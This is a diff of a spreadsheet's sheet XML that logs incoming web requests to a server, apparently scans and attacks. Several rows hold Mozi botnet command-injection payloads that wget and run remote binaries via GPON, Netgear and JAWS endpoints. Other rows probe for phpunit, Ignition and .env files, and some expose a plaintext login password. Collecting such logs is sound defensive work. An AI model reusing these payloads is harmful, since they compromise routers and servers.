--- a/test.xlsx
+++ b/test.xlsx
@@ -421,7 +421,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:E18"/>
+  <dimension ref="A1:E104"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
@@ -467,23 +467,23 @@
     <row r="2">
       <c r="A2" t="inlineStr">
         <is>
-          <t>2021-02-25 00:23:41.380</t>
+          <t>2021-03-02 00:28:11.125</t>
         </is>
       </c>
       <c r="B2" t="inlineStr">
         <is>
-          <t xml:space="preserve">34.78.227.165 
+          <t xml:space="preserve">205.185.122.102 GB
 </t>
         </is>
       </c>
       <c r="C2" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>GET /config/getuser</t>
         </is>
       </c>
       <c r="D2" t="inlineStr">
         <is>
-          <t>null</t>
+          <t>index=0</t>
         </is>
       </c>
       <c r="E2" t="inlineStr">
@@ -495,12 +495,12 @@
     <row r="3">
       <c r="A3" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:09.544</t>
+          <t>2021-03-02 01:07:01.667</t>
         </is>
       </c>
       <c r="B3" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">162.142.125.39 
 </t>
         </is>
       </c>
@@ -511,7 +511,7 @@
       </c>
       <c r="D3" t="inlineStr">
         <is>
-          <t>XDEBUG_SESSION_START=phpstorm</t>
+          <t>null</t>
         </is>
       </c>
       <c r="E3" t="inlineStr">
@@ -523,18 +523,18 @@
     <row r="4">
       <c r="A4" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:22.908</t>
+          <t>2021-03-02 01:07:01.981</t>
         </is>
       </c>
       <c r="B4" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">162.142.125.39 
 </t>
         </is>
       </c>
       <c r="C4" t="inlineStr">
         <is>
-          <t>GET /console/</t>
+          <t>GET /</t>
         </is>
       </c>
       <c r="D4" t="inlineStr">
@@ -551,18 +551,18 @@
     <row r="5">
       <c r="A5" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:26.216</t>
+          <t>2021-03-02 02:11:40.624</t>
         </is>
       </c>
       <c r="B5" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">74.120.14.55 
 </t>
         </is>
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>GET /_ignition/execute-solution</t>
+          <t>GET /</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
@@ -579,46 +579,46 @@
     <row r="6">
       <c r="A6" t="inlineStr">
         <is>
-          <t>2021-02-25 00:46:20.021</t>
+          <t>2021-03-02 02:42:15.911</t>
         </is>
       </c>
       <c r="B6" t="inlineStr">
         <is>
-          <t xml:space="preserve">176.113.161.65 
+          <t xml:space="preserve">2.57.122.25 
 </t>
         </is>
       </c>
       <c r="C6" t="inlineStr">
         <is>
-          <t>POST /GponForm/diag_Form</t>
+          <t>GET /</t>
         </is>
       </c>
       <c r="D6" t="inlineStr">
         <is>
-          <t>images/</t>
+          <t>null</t>
         </is>
       </c>
       <c r="E6" t="inlineStr">
         <is>
-          <t xml:space="preserve"> XWebPageName=diag&amp;diag_action=ping&amp;wan_conlist=0&amp;dest_host=``;wget+http://176.113.161.65:40089/Mozi.m+-O+-&gt;/tmp/gpon80</t>
+          <t xml:space="preserve"> </t>
         </is>
       </c>
     </row>
     <row r="7">
       <c r="A7" t="inlineStr">
         <is>
-          <t>2021-02-25 13:10:09.891</t>
+          <t>2021-03-02 02:42:16.209</t>
         </is>
       </c>
       <c r="B7" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.10.206 
+          <t xml:space="preserve">2.57.122.25 
 </t>
         </is>
       </c>
       <c r="C7" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>GET /favicon.ico</t>
         </is>
       </c>
       <c r="D7" t="inlineStr">
@@ -635,23 +635,23 @@
     <row r="8">
       <c r="A8" t="inlineStr">
         <is>
-          <t>2021-02-25 13:25:56.695</t>
+          <t>2021-03-02 02:44:07.308</t>
         </is>
       </c>
       <c r="B8" t="inlineStr">
         <is>
-          <t xml:space="preserve">74.120.14.39 
+          <t xml:space="preserve">45.222.11.194 
 </t>
         </is>
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>GET /setup.cgi</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
         <is>
-          <t>null</t>
+          <t>next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1</t>
         </is>
       </c>
       <c r="E8" t="inlineStr">
@@ -663,12 +663,12 @@
     <row r="9">
       <c r="A9" t="inlineStr">
         <is>
-          <t>2021-02-25 13:25:57.071</t>
+          <t>2021-03-02 02:50:40.661</t>
         </is>
       </c>
       <c r="B9" t="inlineStr">
         <is>
-          <t xml:space="preserve">74.120.14.39 
+          <t xml:space="preserve">2.57.122.25 
 </t>
         </is>
       </c>
@@ -691,41 +691,46 @@
     <row r="10">
       <c r="A10" t="inlineStr">
         <is>
-          <t>2021-02-25 15:29:55.521</t>
+          <t>2021-03-02 02:50:40.996</t>
         </is>
       </c>
       <c r="B10" t="inlineStr">
         <is>
-          <t xml:space="preserve">0:0:0:0:0:0:0:1 KR
+          <t xml:space="preserve">2.57.122.25 
 </t>
         </is>
       </c>
       <c r="C10" t="inlineStr">
         <is>
-          <t>GET /csrf2</t>
+          <t>GET /favicon.ico</t>
         </is>
       </c>
       <c r="D10" t="inlineStr">
         <is>
           <t>null</t>
+        </is>
+      </c>
+      <c r="E10" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
         </is>
       </c>
     </row>
     <row r="11">
       <c r="A11" t="inlineStr">
         <is>
-          <t>2021-02-25 13:10:09.891</t>
+          <t>2021-03-02 03:23:48.859</t>
         </is>
       </c>
       <c r="B11" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.10.206 
+          <t xml:space="preserve">3.83.154.240 
 </t>
         </is>
       </c>
       <c r="C11" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>GET /.env</t>
         </is>
       </c>
       <c r="D11" t="inlineStr">
@@ -742,18 +747,18 @@
     <row r="12">
       <c r="A12" t="inlineStr">
         <is>
-          <t>2021-02-25 13:25:56.695</t>
+          <t>2021-03-02 03:45:45.628</t>
         </is>
       </c>
       <c r="B12" t="inlineStr">
         <is>
-          <t xml:space="preserve">74.120.14.39 
+          <t xml:space="preserve">3.83.154.240 
 </t>
         </is>
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>POST /</t>
         </is>
       </c>
       <c r="D12" t="inlineStr">
@@ -763,19 +768,19 @@
       </c>
       <c r="E12" t="inlineStr">
         <is>
-          <t xml:space="preserve"> </t>
+          <t xml:space="preserve"> 0x%5B%5D=androxgh0st</t>
         </is>
       </c>
     </row>
     <row r="13">
       <c r="A13" t="inlineStr">
         <is>
-          <t>2021-02-25 13:25:57.071</t>
+          <t>2021-03-02 03:50:52.817</t>
         </is>
       </c>
       <c r="B13" t="inlineStr">
         <is>
-          <t xml:space="preserve">74.120.14.39 
+          <t xml:space="preserve">162.142.125.53 
 </t>
         </is>
       </c>
@@ -798,12 +803,12 @@
     <row r="14">
       <c r="A14" t="inlineStr">
         <is>
-          <t>2021-02-25 00:23:41.380</t>
+          <t>2021-03-02 04:08:16.748</t>
         </is>
       </c>
       <c r="B14" t="inlineStr">
         <is>
-          <t xml:space="preserve">34.78.227.165 
+          <t xml:space="preserve">174.138.4.57 
 </t>
         </is>
       </c>
@@ -826,23 +831,23 @@
     <row r="15">
       <c r="A15" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:09.544</t>
+          <t>2021-03-02 04:08:17.089</t>
         </is>
       </c>
       <c r="B15" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">174.138.4.57 
 </t>
         </is>
       </c>
       <c r="C15" t="inlineStr">
         <is>
-          <t>GET /</t>
+          <t>GET /favicon.ico</t>
         </is>
       </c>
       <c r="D15" t="inlineStr">
         <is>
-          <t>XDEBUG_SESSION_START=phpstorm</t>
+          <t>null</t>
         </is>
       </c>
       <c r="E15" t="inlineStr">
@@ -854,23 +859,23 @@
     <row r="16">
       <c r="A16" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:22.908</t>
+          <t>2021-03-02 04:08:22.359</t>
         </is>
       </c>
       <c r="B16" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">27.201.157.159 
 </t>
         </is>
       </c>
       <c r="C16" t="inlineStr">
         <is>
-          <t>GET /console/</t>
+          <t>GET /shell</t>
         </is>
       </c>
       <c r="D16" t="inlineStr">
         <is>
-          <t>null</t>
+          <t>cd+/tmp;rm+-rf+*;wget+http://27.201.157.159:54221/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws</t>
         </is>
       </c>
       <c r="E16" t="inlineStr">
@@ -882,18 +887,18 @@
     <row r="17">
       <c r="A17" t="inlineStr">
         <is>
-          <t>2021-02-25 00:45:26.216</t>
+          <t>2021-03-02 04:19:14.418</t>
         </is>
       </c>
       <c r="B17" t="inlineStr">
         <is>
-          <t xml:space="preserve">10.0.20.244 
+          <t xml:space="preserve">142.93.244.247 
 </t>
         </is>
       </c>
       <c r="C17" t="inlineStr">
         <is>
-          <t>GET /_ignition/execute-solution</t>
+          <t>GET /</t>
         </is>
       </c>
       <c r="D17" t="inlineStr">
@@ -910,26 +915,2424 @@
     <row r="18">
       <c r="A18" t="inlineStr">
         <is>
+          <t>2021-03-02 04:29:07.279</t>
+        </is>
+      </c>
+      <c r="B18" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C18" t="inlineStr">
+        <is>
+          <t>GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
+        </is>
+      </c>
+      <c r="D18" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E18" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> &lt;?=md5("phpunit")?&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>2021-03-02 04:29:15.058</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>GET /wp-content/plugins/wp-file-manager/readme.txt</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E19" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="20">
+      <c r="A20" t="inlineStr">
+        <is>
+          <t>2021-03-02 04:29:18.969</t>
+        </is>
+      </c>
+      <c r="B20" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C20" t="inlineStr">
+        <is>
+          <t>GET /console/</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E20" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>2021-03-02 04:29:22.346</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>GET /_ignition/execute-solution</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E21" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="22">
+      <c r="A22" t="inlineStr">
+        <is>
+          <t>2021-03-02 04:40:27.944</t>
+        </is>
+      </c>
+      <c r="B22" t="inlineStr">
+        <is>
+          <t xml:space="preserve">65.49.20.69 
+</t>
+        </is>
+      </c>
+      <c r="C22" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D22" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E22" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="23">
+      <c r="A23" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:00:54.727</t>
+        </is>
+      </c>
+      <c r="B23" t="inlineStr">
+        <is>
+          <t xml:space="preserve">89.190.156.31 
+</t>
+        </is>
+      </c>
+      <c r="C23" t="inlineStr">
+        <is>
+          <t>HEAD /robots.txt</t>
+        </is>
+      </c>
+      <c r="D23" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E23" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="24">
+      <c r="A24" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:13:36.184</t>
+        </is>
+      </c>
+      <c r="B24" t="inlineStr">
+        <is>
+          <t xml:space="preserve">162.142.125.54 
+</t>
+        </is>
+      </c>
+      <c r="C24" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E24" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="25">
+      <c r="A25" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:17:18.100</t>
+        </is>
+      </c>
+      <c r="B25" t="inlineStr">
+        <is>
+          <t xml:space="preserve">178.175.52.93 
+</t>
+        </is>
+      </c>
+      <c r="C25" t="inlineStr">
+        <is>
+          <t>GET /setup.cgi</t>
+        </is>
+      </c>
+      <c r="D25" t="inlineStr">
+        <is>
+          <t>next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://178.175.52.93:37574/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1</t>
+        </is>
+      </c>
+      <c r="E25" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="26">
+      <c r="A26" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:22:35.647</t>
+        </is>
+      </c>
+      <c r="B26" t="inlineStr">
+        <is>
+          <t xml:space="preserve">161.35.138.51 
+</t>
+        </is>
+      </c>
+      <c r="C26" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D26" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E26" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="27">
+      <c r="A27" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:24:22.927</t>
+        </is>
+      </c>
+      <c r="B27" t="inlineStr">
+        <is>
+          <t xml:space="preserve">161.35.134.216 
+</t>
+        </is>
+      </c>
+      <c r="C27" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D27" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E27" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="28">
+      <c r="A28" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:34:57.835</t>
+        </is>
+      </c>
+      <c r="B28" t="inlineStr">
+        <is>
+          <t xml:space="preserve">178.175.3.5 
+</t>
+        </is>
+      </c>
+      <c r="C28" t="inlineStr">
+        <is>
+          <t>GET /setup.cgi</t>
+        </is>
+      </c>
+      <c r="D28" t="inlineStr">
+        <is>
+          <t>next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://178.175.3.5:34386/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1</t>
+        </is>
+      </c>
+      <c r="E28" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="29">
+      <c r="A29" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:35:55.078</t>
+        </is>
+      </c>
+      <c r="B29" t="inlineStr">
+        <is>
+          <t xml:space="preserve">178.175.99.62 
+</t>
+        </is>
+      </c>
+      <c r="C29" t="inlineStr">
+        <is>
+          <t>POST /GponForm/diag_Form</t>
+        </is>
+      </c>
+      <c r="D29" t="inlineStr">
+        <is>
+          <t>images/</t>
+        </is>
+      </c>
+      <c r="E29" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> XWebPageName=diag&amp;diag_action=ping&amp;wan_conlist=0&amp;dest_host=``;wget+http://178.175.99.62:38464/Mozi.m+-O+-&gt;/tmp/gpon80;</t>
+        </is>
+      </c>
+    </row>
+    <row r="30">
+      <c r="A30" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:39:18.245</t>
+        </is>
+      </c>
+      <c r="B30" t="inlineStr">
+        <is>
+          <t xml:space="preserve">209.17.96.210 
+</t>
+        </is>
+      </c>
+      <c r="C30" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D30" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E30" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="31">
+      <c r="A31" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:48:13.357</t>
+        </is>
+      </c>
+      <c r="B31" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C31" t="inlineStr">
+        <is>
+          <t>POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E31" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> &lt;?=md5("phpunit")?&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="32">
+      <c r="A32" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:48:17.344</t>
+        </is>
+      </c>
+      <c r="B32" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C32" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr">
+        <is>
+          <t>XDEBUG_SESSION_START=phpstorm</t>
+        </is>
+      </c>
+      <c r="E32" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:48:24.456</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>GET /console/</t>
+        </is>
+      </c>
+      <c r="D33" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E33" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>2021-03-02 05:48:27.866</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.155.205.225 
+</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>GET /_ignition/execute-solution</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E34" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>2021-03-02 06:49:22.133</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t xml:space="preserve">3.239.113.159 
+</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>GET /.env</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E35" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>2021-03-02 06:50:38.079</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t xml:space="preserve">3.239.113.159 
+</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>POST /</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E36" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> 0x%5B%5D=androxgh0st</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>2021-03-02 07:40:53.574</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t xml:space="preserve">42.232.230.53 
+</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>GET /boaform/admin/formLogin</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>username=user&amp;psd=user</t>
+        </is>
+      </c>
+      <c r="E37" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:00:26.961</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t xml:space="preserve">172.105.89.161 
+</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>GET /0bef</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E38" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:15:06.202</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t xml:space="preserve">192.241.226.27 
+</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>GET /owa/auth/logon.aspx</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>url=https%3a%2f%2f1%2fecp%2f</t>
+        </is>
+      </c>
+      <c r="E39" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:23:28.831</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t xml:space="preserve">45.144.225.116 GB
+</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E40" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:42:50.708</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t xml:space="preserve">209.17.97.74 
+</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E41" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:43:20.280</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t xml:space="preserve">71.6.232.7 
+</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E42" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>2021-03-02 08:49:25.360</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t xml:space="preserve">205.185.122.102 GB
+</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>GET /config/getuser</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>index=0</t>
+        </is>
+      </c>
+      <c r="E43" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>2021-03-02 09:05:14.807</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t xml:space="preserve">20.199.49.185 
+</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>POST /</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E44" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> 0x%5B%5D=androxgh0st</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>2021-03-02 09:06:23.878</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t xml:space="preserve">167.248.133.38 
+</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E45" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="46">
+      <c r="A46" t="inlineStr">
+        <is>
+          <t>2021-03-02 09:54:33.235</t>
+        </is>
+      </c>
+      <c r="B46" t="inlineStr">
+        <is>
+          <t xml:space="preserve">193.118.53.202 
+</t>
+        </is>
+      </c>
+      <c r="C46" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D46" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E46" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="47">
+      <c r="A47" t="inlineStr">
+        <is>
+          <t>2021-03-02 10:20:52.869</t>
+        </is>
+      </c>
+      <c r="B47" t="inlineStr">
+        <is>
+          <t xml:space="preserve">162.142.125.39 
+</t>
+        </is>
+      </c>
+      <c r="C47" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D47" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E47" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="48">
+      <c r="A48" t="inlineStr">
+        <is>
+          <t>2021-03-02 11:31:06.370</t>
+        </is>
+      </c>
+      <c r="B48" t="inlineStr">
+        <is>
+          <t xml:space="preserve">223.39.215.205 
+</t>
+        </is>
+      </c>
+      <c r="C48" t="inlineStr">
+        <is>
+          <t>POST /user/login</t>
+        </is>
+      </c>
+      <c r="D48" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E48" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> {"id":"admin1","pwd":"qoom100411"}</t>
+        </is>
+      </c>
+    </row>
+    <row r="49">
+      <c r="A49" t="inlineStr">
+        <is>
+          <t>2021-03-02 11:35:28.007</t>
+        </is>
+      </c>
+      <c r="B49" t="inlineStr">
+        <is>
+          <t xml:space="preserve">223.39.215.205 
+</t>
+        </is>
+      </c>
+      <c r="C49" t="inlineStr">
+        <is>
+          <t>POST /user/login</t>
+        </is>
+      </c>
+      <c r="D49" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E49" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> {"id":"admin1","pwd":"qoom100411"}</t>
+        </is>
+      </c>
+    </row>
+    <row r="50">
+      <c r="A50" t="inlineStr">
+        <is>
+          <t>2021-03-02 11:35:33.541</t>
+        </is>
+      </c>
+      <c r="B50" t="inlineStr">
+        <is>
+          <t xml:space="preserve">223.39.215.205 
+</t>
+        </is>
+      </c>
+      <c r="C50" t="inlineStr">
+        <is>
+          <t>POST /user/login</t>
+        </is>
+      </c>
+      <c r="D50" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E50" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> {"id":"admin1","pwd":"qoom100411"}</t>
+        </is>
